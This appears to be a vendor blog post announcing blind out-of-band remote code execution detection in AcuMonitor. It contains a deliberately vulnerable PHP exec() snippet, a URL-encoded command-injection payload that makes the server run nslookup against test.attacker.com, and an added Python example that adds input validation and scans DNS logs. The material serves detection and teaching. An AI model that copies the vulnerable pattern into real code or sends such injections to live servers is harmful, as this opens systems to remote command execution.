Blind Out-of-band Remote Code Execution vulnerability testing added to AcuMonitor

Similar to Blind Out-of-band SQL Injection vulnerabilities, AcuMonitor can now detect Blind Out-of-band Remote Code Execution vulnerabilities.
Let’s consider a vulnerable PHP application that contains the following code:

<?php
// Deliberately vulnerable: the value of the "1" query parameter is
// concatenated straight into a shell command line.
$cmd = isset($_GET['1']) ? $_GET['1'] : '';
if ($cmd) {
    // The output of exec() is discarded, so the user never sees the result (blind).
    exec('ping -c 1 ' . $cmd);
}

This application executes a shell command that is composed from the user input. However, the result of the command execution is not returned to the user.

An attacker could issue a payload such as:

test.php?1=localhost%26nslookup+test.attacker.com%26

URL-decoding the payload gives the following OS command:

ping -c 1 localhost&nslookup test.attacker.com&

This forces the server to initiate a name lookup (a DNS query) for test.attacker.com.
An attacker can monitor the DNS server logs for such queries and thereby detect Blind Remote Code Execution vulnerabilities such as this one.
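The following is an added example, not code from the original post and not AcuMonitor's own implementation. It decodes the payload shown above to reproduce the resulting command line, shows the strict allowlist check that a hardened version of the application could apply before building the ping command (argv list, no shell), and parses constructed DNS query log lines to flag out-of-band lookups for a monitoring domain. The monitoring domain test.attacker.com comes from the post; the BIND-style log format, the sample log lines and the per-request token subdomain (abc123) are assumptions made here.

```python
"""Added example: payload decoding, hardened input check, and DNS-log
detection of out-of-band lookups. Log format and token are assumptions."""
import re
from urllib.parse import unquote_plus

# Strict allowlist for what the ping parameter may contain: a hostname
# (DNS labels) or a dotted IPv4 address. Spaces, '&', ';', '|' and other
# shell metacharacters are rejected before anything reaches a shell.
HOST_RE = re.compile(r"^(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)"
                     r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def decode_payload(query_value: str) -> str:
    """URL-decode the raw value of the '1' parameter ('+' -> space, '%26' -> '&')."""
    return unquote_plus(query_value)


def unsafe_command(user_input: str) -> str:
    """Mirrors the vulnerable PHP: plain concatenation handed to a shell."""
    return "ping -c 1 " + user_input


def is_valid_host(user_input: str) -> bool:
    """True only if the value is a plausible hostname/IPv4 of sane length."""
    return len(user_input) <= 253 and HOST_RE.match(user_input) is not None


def safe_command(user_input: str) -> list:
    """Hardened equivalent: validate first, then build an argv list that is
    executed without a shell (e.g. subprocess.run(argv)). Raises on rejection."""
    if not is_valid_host(user_input):
        raise ValueError("rejected ping target: %r" % user_input)
    return ["ping", "-c", "1", user_input]


# Constructed sample of a BIND-style query log (assumed format, not real data).
SAMPLE_DNS_LOG = """\
10-Mar-2016 12:00:01.123 client 203.0.113.10#5353: query: www.example.org IN A + (198.51.100.1)
10-Mar-2016 12:00:02.456 client 203.0.113.10#5353: query: test.attacker.com IN A + (198.51.100.1)
10-Mar-2016 12:00:03.789 client 203.0.113.10#5353: query: abc123.test.attacker.com IN A + (198.51.100.1)
"""

QUERY_RE = re.compile(r"client (?P<client>[\d.]+)#\d+: query: (?P<name>\S+) IN (?P<type>\S+)")


def find_oob_lookups(log_text: str, monitor_domain: str) -> list:
    """Return (client_ip, queried_name) for every query that targets the
    monitoring domain or a subdomain of it. A unique subdomain label per
    injected payload (assumed here) lets the defender tie a lookup back to
    the specific request that triggered it."""
    hits = []
    domain = monitor_domain.lower()
    suffix = "." + domain
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        name = m.group("name").rstrip(".").lower()
        if name == domain or name.endswith(suffix):
            hits.append((m.group("client"), name))
    return hits


if __name__ == "__main__":
    raw = "localhost%26nslookup+test.attacker.com%26"
    decoded = decode_payload(raw)
    print("shell sees :", unsafe_command(decoded))
    try:
        safe_command(decoded)
    except ValueError as err:
        print("hardened   :", err)
    print("argv       :", safe_command("localhost"))
    for client, name in find_oob_lookups(SAMPLE_DNS_LOG, "test.attacker.com"):
        print("OOB lookup from %s for %s" % (client, name))
```

The allowlist check rejects the decoded payload because of the `&` and space characters, while `localhost` or a dotted IPv4 address passes; the log parser reports both the bare monitoring domain and any subdomain of it, so a per-request token in the leftmost label can be matched against the scan that sent it.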

AcuMonitor can now detect such vulnerabilities as well and will send an email when this occurs.

AcuMonitor Blind Out-of-band Remote Code Execution alert

Reader comment: Please, what is the severity level of this alert: 0, 1, 2 or 3?